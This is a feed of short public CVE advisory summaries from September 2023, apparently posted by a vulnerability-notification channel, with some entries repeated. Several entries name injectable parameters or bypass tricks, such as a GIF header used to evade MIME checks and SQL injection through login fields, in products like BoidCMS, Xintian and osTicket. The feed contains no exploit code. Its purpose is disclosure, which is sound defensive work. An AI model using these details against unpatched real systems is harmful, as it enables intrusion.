🚨 CVE-2023-35124An information disclosure vulnerability exists in the OAS Engine configuration management functionality of Open Automation Software OAS Platform v18.00.0072. A specially crafted series of network requests can lead to a disclosure of sensitive information. An attacker can send a sequence of requests to trigger this vulnerability.🎖@cveNotify |
|
| 2023-09-08 18:58:18 |
🚨 CVE-2023-2453There is insufficient sanitization of tainted file names that are directly concatenated with a path that is subsequently passed to a ‘require_once’ statement. This allows arbitrary files with the ‘.php’ extension for which the absolute path is known to be included and executed. There are no known means in PHPFusion through which an attacker can upload and target a ‘.php’ file payload.🎖@cveNotify |
|
| 2023-09-08 18:58:17 |
🚨 CVE-2023-31242An authentication bypass vulnerability exists in the OAS Engine functionality of Open Automation Software OAS Platform v18.00.0072. A specially-crafted series of network requests can lead to arbitrary authentication. An attacker can send a sequence of requests to trigger this vulnerability.🎖@cveNotify |
|
| 2023-09-08 16:58:59 |
🚨 CVE-2023-30722Protection Mechanism Failure in bc_tui trustlet from Samsung Blockchain Keystore prior to version 1.3.13.5 allows local attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-09-08 16:58:58 |
🚨 CVE-2015-1391Aruba AirWave before 8.0.7 allows bypass of a CSRF protection mechanism.🎖@cveNotify |
|
| 2023-09-08 16:58:56 |
🚨 CVE-2023-41908Cerebrate before 1.15 lacks the Secure attribute for the session cookie.🎖@cveNotify |
|
| 2023-09-08 16:58:55 |
🚨 CVE-2023-3375Unrestricted Upload of File with Dangerous Type vulnerability in Unisign Bookreen allows OS Command Injection.This issue affects Bookreen: before 3.0.0.🎖@cveNotify |
|
| 2023-09-08 14:58:42 |
🚨 CVE-2023-38836File Upload vulnerability in BoidCMS v.2.0.0 allows a remote attacker to execute arbitrary code by adding a GIF header to bypass MIME type checks.🎖@cveNotify |
|
| 2023-09-08 14:58:38 |
🚨 CVE-2022-41763An issue was discovered in NOKIA AMS 9.7.05. Remote Code Execution exists via the debugger of the ipAddress variable. A remote user, authenticated to the AMS server, could inject code in the PING function. The privileges of the command executed depend on the user that runs the service.🎖@cveNotify |
|
| 2023-09-08 14:58:37 |
🚨 CVE-2023-32470Dell Digital Delivery versions prior to 5.0.82.0 contain an Insecure Operation on Windows Junction / Mount Point vulnerability. A local malicious user could potentially exploit this vulnerability to create arbitrary folder leading to permanent Denial of Service (DOS).🎖@cveNotify |
|
| 2023-09-08 14:58:36 |
🚨 CVE-2023-34041Cloud foundry routing release versions prior to 0.278.0 are vulnerable to abuse of HTTP Hop-by-Hop Headers. An unauthenticated attacker can use this vulnerability for headers like B3 or X-B3-SpanID to affect the identification value recorded in the logs in foundations.🎖@cveNotify |
|
| 2023-09-08 14:58:35 |
🚨 CVE-2023-41775Improper access control vulnerability in 'direct' Desktop App for macOS ver 2.6.0 and earlier allows a local attacker to bypass access restriction and to use camrea, microphone, etc. of the device where the product is installed without the user's consent.🎖@cveNotify |
|
| 2023-09-08 11:58:12 |
🚨 CVE-2023-32470Dell Digital Delivery versions prior to 5.0.82.0 contain an Insecure Operation on Windows Junction / Mount Point vulnerability. A local malicious user could potentially exploit this vulnerability to create arbitrary folder leading to permanent Denial of Service (DOS).🎖@cveNotify |
|
| 2023-09-08 05:58:35 |
🚨 CVE-2023-40953icms 7.0.16 is vulnerable to Cross Site Request Forgery (CSRF).🎖@cveNotify |
|
| 2023-09-08 05:58:34 |
🚨 CVE-2023-41594Dairy Farm Shop Management System Using PHP and MySQL v1.1 was discovered to contain multiple SQL injection vulnerabilities in the Login function via the Username and Password parameters.🎖@cveNotify |
|
| 2023-09-08 05:58:33 |
🚨 CVE-2014-5329GIGAPOD file servers (Appliance model and Software model) provide two web interfaces, 80/tcp and 443/tcp for user operation, and 8001/tcp for administrative operation.8001/tcp is served by a version of Apache HTTP server containing a flaw in handling HTTP requests (CVE-2011-3192), which may lead to a denial-of-service (DoS) condition.🎖@cveNotify |
|
| 2023-09-08 05:58:29 |
🚨 CVE-2023-35785Zoho ManageEngine Active Directory 360 versions 4315 and below, ADAudit Plus 7202 and below, ADManager Plus 7200 and below, Asset Explorer 7002 and below, Cloud Security Plus 4161 and below, Data Security Plus 6110 and below, Eventlog Analyzer 12301 and below, Exchange Reporter Plus 5709 and below, Log360 5315 and below, Log360 UEBA 4045 and below, M365 Manager Plus 4529 and below, M365 Security Plus 4529 and below, Recovery Manager Plus 6061 and below, ServiceDesk Plus 14302 and below, ServiceDesk Plus MSP 14300 and below, SharePoint Manager Plus 4402 and below and Support Center Plus 14300 and below are vulnerable to the authentication bypass vulnerability via a few authenticators.🎖@cveNotify |
|
| 2023-09-08 05:58:28 |
🚨 CVE-2023-40271In Trusted Firmware-M through TF-Mv1.8.0, for platforms that integrate the CryptoCell accelerator, when the CryptoCell PSA Driver software Interface is selected, and the Authenticated Encryption with Associated Data Chacha20-Poly1305 algorithm is used, with the single-part verification function (defined during the build-time configuration phase) implemented with a dedicated function (i.e., not relying on usage of multipart functions), the buffer comparison during the verification of the authentication tag does not happen on the full 16 bytes but just on the first 4 bytes, thus leading to the possibility that unauthenticated payloads might be identified as authentic. This affects TF-Mv1.6.0, TF-Mv1.6.1, TF-Mv1.7.0, and TF-Mv1.8.🎖@cveNotify |
|
| 2023-09-08 05:58:27 |
🚨 CVE-2021-45811A SQL injection vulnerability in the "Search" functionality of "tickets.php" page in osTicket 1.15.x allows authenticated attackers to execute arbitrary SQL commands via the "keywords" and "topic_id" URL parameters combination.🎖@cveNotify |
|
| 2023-09-08 05:58:26 |
🚨 CVE-2023-36184CMysten Labs Sui blockchain v1.2.0 was discovered to contain a stack overflow via the component /spec/openrpc.json.🎖@cveNotify |
|
| 2023-09-08 05:58:22 |
🚨 CVE-2022-48571memcached 1.6.7 allows a Denial of Service via multi-packet uploads in UDP.🎖@cveNotify |
|
| 2023-09-08 05:58:21 |
🚨 CVE-2022-21299Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.0.1; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2023-09-08 05:58:20 |
🚨 CVE-2022-21340Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.0.1; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2023-09-08 05:58:16 |
🚨 CVE-2022-21283Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 11.0.13, 17.0.1; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2023-09-08 05:58:15 |
🚨 CVE-2022-21360Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.0.1; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2023-09-08 05:58:14 |
🚨 CVE-2022-21277Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Oracle Java SE: 11.0.13, 17.0.1; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2023-09-08 01:58:30 |
🚨 CVE-2023-40029Argo CD is a declarative continuous deployment for Kubernetes. Argo CD Cluster secrets might be managed declaratively using Argo CD / kubectl apply. As a result, the full secret body is stored in`kubectl.kubernetes.io/last-applied-configuration` annotation. pull request #7139 introduced the ability to manage cluster labels and annotations. Since clusters are stored as secrets it also exposes the `kubectl.kubernetes.io/last-applied-configuration` annotation which includes full secret body. In order to view the cluster annotations via the Argo CD API, the user must have `clusters, get` RBAC access. **Note:** In many cases, cluster secrets do not contain any actually-secret information. But sometimes, as in bearer-token auth, the contents might be very sensitive. The bug has been patched in versions 2.8.3, 2.7.14, and 2.6.15. Users are advised to upgrade. Users unable to upgrade should update/deploy cluster secret with `server-side-apply` flag which does not use or rely on `kubectl.kubernetes.io/last-applied-configuration` annotation. Note: annotation for existing secrets will require manual removal.🎖@cveNotify |
|
| 2023-09-08 01:58:29 |
🚨 CVE-2023-40584Argo CD is a declarative continuous deployment for Kubernetes. All versions of ArgoCD starting from v2.4 have a bug where the ArgoCD repo-server component is vulnerable to a Denial-of-Service attack vector. Specifically, the said component extracts a user-controlled tar.gz file without validating the size of its inner files. As a result, a malicious, low-privileged user can send a malicious tar.gz file that exploits this vulnerability to the repo-server, thereby harming the system's functionality and availability. Additionally, the repo-server is susceptible to another vulnerability due to the fact that it does not check the extracted file permissions before attempting to delete them. Consequently, an attacker can craft a malicious tar.gz archive in a way that prevents the deletion of its inner files when the manifest generation process is completed. A patch for this vulnerability has been released in versions 2.6.15, 2.7.14, and 2.8.3. Users are advised to upgrade. The only way to completely resolve the issue is to upgrade, however users unable to upgrade should configure RBAC (Role-Based Access Control) and provide access for configuring applications only to a limited number of administrators. These administrators should utilize trusted and verified Helm charts.🎖@cveNotify |
|
| 2023-09-08 01:58:27 |
🚨 CVE-2023-38440In vowifiservice, there is a possible missing permission check.This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-09-08 01:58:26 |
🚨 CVE-2023-38441In vowifiservice, there is a possible missing permission check.This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-09-08 01:58:25 |
🚨 CVE-2023-38439In vowifiservice, there is a possible missing permission check.This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-09-08 01:58:24 |
🚨 CVE-2023-38438In vowifiservice, there is a possible missing permission check.This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-09-08 01:58:23 |
🚨 CVE-2023-38437In vowifiservice, there is a possible missing permission check.This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-09-08 01:58:22 |
🚨 CVE-2023-30908Potential security vulnerabilities have been identified in Hewlett Packard Enterprise OneView Software. These vulnerabilities could be remotely exploited to allow authentication bypass, disclosure of sensitive information, and denial of service.🎖@cveNotify |
|
| 2023-09-08 01:58:21 |
🚨 CVE-2023-41161Multiple stored cross-site scripting (XSS) vulnerabilities in Usermin 2.000 allow remote attackers to inject arbitrary web script or HTML via the key comment to different pages such as public key details, Export key, sign key, send to key server page, and fetch from key server page tab.🎖@cveNotify |
|
| 2023-09-08 01:58:19 |
🚨 CVE-2023-41646Buttercup v2.20.3 allows attackers to obtain the hash of the master password for the password manager via accessing the file /vaults.json/🎖@cveNotify |
|
| 2023-09-08 01:58:18 |
🚨 CVE-2023-36665"protobuf.js (aka protobufjs) 6.10.0 through 7.x before 7.2.5 allows Prototype Pollution, a different vulnerability than CVE-2022-25878. A user-controlled protobuf message can be used by an attacker to pollute the prototype of Object.prototype by adding and overwriting its data and functions. Exploitation can involve: (1) using the function parse to parse protobuf messages on the fly, (2) loading .proto files by using load/loadSync functions, or (3) providing untrusted input to the functions ReflectionObject.setParsedOption and util.setProperty.🎖@cveNotify |
|
| 2023-09-08 01:58:17 |
🚨 CVE-2023-33918In vowifiservice, there is a possible missing permission check.This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-09-08 01:58:15 |
🚨 CVE-2023-33916In vowifiservice, there is a possible missing permission check.This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-09-08 01:58:14 |
🚨 CVE-2023-38436In vowifiservice, there is a possible missing permission check.This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-09-08 01:58:13 |
🚨 CVE-2023-33917In vowifiservice, there is a possible missing permission check.This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-09-07 22:58:30 |
🚨 CVE-2023-39980A vulnerability that allows the unauthorized disclosure of authenticated information has been identified in MXsecurity versions prior to v1.0.1. This vulnerability arises when special elements are not neutralized correctly, allowing remote attackers to alter SQL commands.🎖@cveNotify |
|
| 2023-09-07 22:58:29 |
🚨 CVE-2023-20193A vulnerability in the Embedded Service Router (ESR) of Cisco ISE could allow an authenticated, local attacker to read, write, or delete arbitrary files on the underlying operating system and escalate their privileges to root. To exploit this vulnerability, an attacker must have valid Administrator-level privileges on the affected device. This vulnerability is due to improper privilege management in the ESR console. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to elevate their privileges to root and read, write, or delete arbitrary files from the underlying operating system of the affected device. Note: The ESR is not enabled by default and must be licensed. To verify the status of the ESR in the Admin GUI, choose Administration > Settings > Protocols > IPSec.🎖@cveNotify |
|
| 2023-09-07 22:58:25 |
🚨 CVE-2023-41316Tolgee is an open-source localization platform. Due to lack of validation field - Org Name, bad actor can send emails with HTML injected code to the victims. Registered users can inject HTML into unsanitized emails from the Tolgee instance to other users. This unsanitized HTML ends up in invitation emails which appear as legitimate org invitations. Bad actors may direct users to malicious website or execute javascript in the context of the users browser. This vulnerability has been addressed in version 3.29.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-09-07 22:58:24 |
🚨 CVE-2023-41061A validation issue was addressed with improved logic. This issue is fixed in watchOS 9.6.2, iOS 16.6.1 and iPadOS 16.6.1. A maliciously crafted attachment may result in arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2023-09-07 22:58:23 |
🚨 CVE-2023-4528Unsafe deserialization in JSCAPE MFT Server versions prior to 2023.1.9 (Windows, Linux, and MacOS) permits an attacker to run arbitrary Java code (including OS commands) via its management interface🎖@cveNotify |
|
| 2023-09-07 22:58:19 |
🚨 CVE-2023-37798A stored cross-site scripting (XSS) vulnerability in the new REDCap project creation function of Vanderbilt REDCap 13.1.35 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the project title parameter.🎖@cveNotify |
|
| 2023-09-07 22:58:18 |
🚨 CVE-2023-39979There is a vulnerability in MXsecurity versions prior to 1.0.1 that can be exploited to bypass authentication. A remote attacker might access the system if the web service authenticator has insufficient random values. 🎖@cveNotify |
|
| 2023-09-07 22:58:17 |
🚨 CVE-2023-4647An issue has been discovered in GitLab affecting all versions starting from 15.2 before 16.1.5, all versions starting from 16.2 before 16.2.5, all versions starting from 16.3 before 16.3.1 in which the projects API pagination can be skipped, potentially leading to DoS on certain instances.🎖@cveNotify |
|
| 2023-09-07 20:58:35 |
🚨 CVE-2023-4712A vulnerability, which was classified as critical, was found in Xintian Smart Table Integrated Management System 5.6.9. This affects an unknown part of the file /SysManage/AddUpdateRole.aspx. The manipulation of the argument txtRoleName leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-238575. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-09-07 20:58:33 |
🚨 CVE-2023-4711A vulnerability, which was classified as critical, has been found in D-Link DAR-8000-10 up to 20230819. Affected by this issue is some unknown functionality of the file /log/decodmail.php. The manipulation of the argument file leads to os command injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-238574 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-09-07 20:58:32 |
🚨 CVE-2023-41046XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. It is possible in XWiki to execute Velocity code without having script right by creating an XClass with a property of type "TextArea" and content type "VelocityCode" or "VelocityWiki". For the former, the syntax of the document needs to be set the `xwiki/1.0` (this syntax doesn't need to be installed). In both cases, when adding the property to an object, the Velocity code is executed regardless of the rights of the author of the property (edit right is still required, though). In both cases, the code is executed with the correct context author so no privileged APIs can be accessed. However, Velocity still grants access to otherwise inaccessible data and APIs that could allow further privilege escalation. At least for "VelocityCode", this behavior is most likely very old but only since XWiki 7.2, script right is a separate right, before that version all users were allowed to execute Velocity and thus this was expected and not a security issue. This has been patched in XWiki 14.10.10 and 15.4 RC1. Users are advised to upgrade. There are no known workarounds.🎖@cveNotify |
|
| 2023-09-07 20:58:31 |
🚨 CVE-2023-41051In a typical Virtual Machine Monitor (VMM) there are several components, such as boot loader, virtual device drivers, virtio backend drivers and vhost drivers, that need to access the VM physical memory. The vm-memory rust crate provides a set of traits to decouple VM memory consumers from VM memory providers. An issue was discovered in the default implementations of the `VolatileMemory::{get_atomic_ref, aligned_as_ref, aligned_as_mut, get_ref, get_array_ref}` trait functions, which allows out-of-bounds memory access if the `VolatileMemory::get_slice` function returns a `VolatileSlice` whose length is less than the function’s `count` argument. No implementations of `get_slice` provided in `vm_memory` are affected. Users of custom `VolatileMemory` implementations may be impacted if the custom implementation does not adhere to `get_slice`'s documentation. The issue started in version 0.1.0 but was fixed in version 0.12.2 by inserting a check that verifies that the `VolatileSlice` returned by `get_slice` is of the correct length. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-09-07 20:58:30 |
🚨 CVE-2023-4710A vulnerability classified as problematic was found in TOTVS RM 12.1. Affected by this vulnerability is an unknown functionality of the component Portal. The manipulation of the argument d leads to cross site scripting. The attack can be launched remotely. The identifier VDB-238573 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-09-07 20:58:29 |
🚨 CVE-2023-41061A validation issue was addressed with improved logic. This issue is fixed in watchOS 9.6.2, iOS 16.6.1 and iPadOS 16.6.1. A maliciously crafted attachment may result in arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2023-09-07 20:58:28 |
🚨 CVE-2023-41064A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.5.2, iOS 16.6.1 and iPadOS 16.6.1. Processing a maliciously crafted image may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2023-09-07 20:58:27 |
🚨 CVE-2023-37798A stored cross-site scripting (XSS) vulnerability in the new REDCap project creation function of Vanderbilt REDCap 13.1.35 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the project title parameter.🎖@cveNotify |
|
| 2023-09-07 20:58:25 |
🚨 CVE-2023-20821In nvram, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07937113; Issue ID: ALPS07937113.🎖@cveNotify |
|
| 2023-09-07 20:58:21 |
🚨 CVE-2023-20825In duraspeed, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privilege needed. User interaction is not needed for exploitation. Patch ID: ALPS07951402; Issue ID: ALPS07951413.🎖@cveNotify |
|
| 2023-09-07 20:58:20 |
🚨 CVE-2023-20836In camsys, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07505629; Issue ID: ALPS07505629.🎖@cveNotify |
|
| 2023-09-07 20:58:19 |
🚨 CVE-2023-20820In wlan service, there is a possible command injection due to improper input validation. This could lead to remote code execution with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00244189; Issue ID: WCNCR00244189.🎖@cveNotify |
|
| 2023-09-07 20:58:18 |
🚨 CVE-2023-20828In gps, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08014144; Issue ID: ALPS08014144.🎖@cveNotify |
|
| 2023-09-07 20:58:14 |
🚨 CVE-2023-20835In camsys, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07341261; Issue ID: ALPS07326570.🎖@cveNotify |
|
| 2023-09-07 20:58:13 |
🚨 CVE-2023-32811In connectivity system driver, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07929848; Issue ID: ALPS07929848.🎖@cveNotify |
|
| 2023-09-07 20:58:12 |
🚨 CVE-2023-32808In bluetooth driver, there is a possible read and write access to registers due to improper access control of register interface. This could lead to local leak of sensitive information with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07849751; Issue ID: ALPS07849751.🎖@cveNotify |
|
| 2023-09-07 18:58:24 |
🚨 CVE-2023-40239Certain Lexmark devices (such as CS310) before 2023-08-25 allow XXE attacks, leading to information disclosure. The fixed firmware version is LW80.*.P246, i.e., '*' indicates that the full version specification varies across product model family, but firmware level P246 (or higher) is required to remediate the vulnerability.🎖@cveNotify |
|
| 2023-09-07 18:58:23 |
🚨 CVE-2023-30800The web server used by MikroTik RouterOS version 6 is affected by a heap memory corruption issue. A remote and unauthenticated attacker can corrupt the server's heap memory by sending a crafted HTTP request. As a result, the web interface crashes and is immediately restarted. The issue was fixed in RouterOS 6.49.10 stable. RouterOS version 7 is not affected.🎖@cveNotify |
|
| 2023-09-07 18:58:22 |
🚨 CVE-2023-40060A vulnerability has been identified within Serv-U 15.4 and 15.4 Hotfix 1 that, if exploited, allows an actor to bypass multi-factor/two-factor authentication. The actor must have administrator-level access to Serv-U to perform this action. 15.4. SolarWinds found that the issue was not completely fixed in 15.4 Hotfix 1. 🎖@cveNotify |
|
| 2023-09-07 18:58:19 |
🚨 CVE-2021-44189Adobe After Effects versions 22.0 (and earlier) and 18.4.2 (and earlier) are affected by an Use-After-Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-07 18:58:18 |
🚨 CVE-2021-44190Adobe After Effects versions 22.0 (and earlier) and 18.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-07 18:58:17 |
🚨 CVE-2021-44195Adobe After Effects versions 22.0 (and earlier) and 18.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-09-07 16:58:40 |
🚨 CVE-2023-40576FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. Affected versions are subject to an Out-Of-Bounds Read in the `RleDecompress` function. This Out-Of-Bounds Read occurs because FreeRDP processes the `pbSrcBuffer` variable without checking if it contains data of sufficient length. Insufficient data in the `pbSrcBuffer` variable may cause errors or crashes. This issue has been addressed in version 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-09-07 16:58:39 |
🚨 CVE-2023-20849In imgsys_cmdq, there is a possible use after free due to a missing valid range checking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS07340433; Issue ID: ALPS07340350.🎖@cveNotify |
|
| 2023-09-07 16:58:38 |
🚨 CVE-2023-20850In imgsys_cmdq, there is a possible out of bounds write due to a missing valid range checking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS07340433; Issue ID: ALPS07340381.🎖@cveNotify |
|
| 2023-09-07 16:58:37 |
🚨 CVE-2023-32817In gnss service, there is a possible out of bounds read due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08044040; Issue ID: ALPS08044035.🎖@cveNotify |
|
| 2023-09-07 16:58:33 |
🚨 CVE-2023-32816In gnss service, there is a possible out of bounds read due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08044040; Issue ID: ALPS08044032.🎖@cveNotify |
|
| 2023-09-07 16:58:32 |
🚨 CVE-2023-20847In imgsys_cmdq, there is a possible out of bounds read due to a missing valid range checking. This could lead to local denial of service with System execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS07354025; Issue ID: ALPS07340108.🎖@cveNotify |
|
| 2023-09-07 16:58:31 |
🚨 CVE-2023-32813In gnss service, there is a possible out of bounds write due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08017370; Issue ID: ALPS08017370.🎖@cveNotify |
|
| 2023-09-07 16:58:27 |
🚨 CVE-2023-32814In gnss service, there is a possible out of bounds read due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08031947; Issue ID: ALPS08031947.🎖@cveNotify |
|
| 2023-09-07 16:58:26 |
🚨 CVE-2023-20838In imgsys, there is a possible out of bounds read due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS07326455; Issue ID: ALPS07326418.🎖@cveNotify |
|
| 2023-09-07 16:58:25 |
🚨 CVE-2023-20843In imgsys_cmdq, there is a possible out of bounds read due to a missing valid range checking. This could lead to local information disclosure with System execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS07340119; Issue ID: ALPS07340119.🎖@cveNotify |
|
| 2023-09-07 16:58:24 |
🚨 CVE-2023-20845In imgsys, there is a possible out of bounds read due to a missing valid range checking. This could lead to local information disclosure with System execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS07197795; Issue ID: ALPS07340357.🎖@cveNotify |
|
| 2023-09-07 16:58:21 |
🚨 CVE-2023-20844In imgsys_cmdq, there is a possible out of bounds read due to a missing valid range checking. This could lead to local information disclosure with System execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS07354058; Issue ID: ALPS07340121.🎖@cveNotify |
|
| 2023-09-07 16:58:19 |
🚨 CVE-2023-20837In seninf, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07992786; Issue ID: ALPS07992786.🎖@cveNotify |
|
| 2023-09-07 16:58:18 |
🚨 CVE-2023-20841In imgsys, there is a possible out of bounds write due to a missing valid range checking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS07326455; Issue ID: ALPS07326441.🎖@cveNotify |
|
| 2023-09-07 16:58:17 |
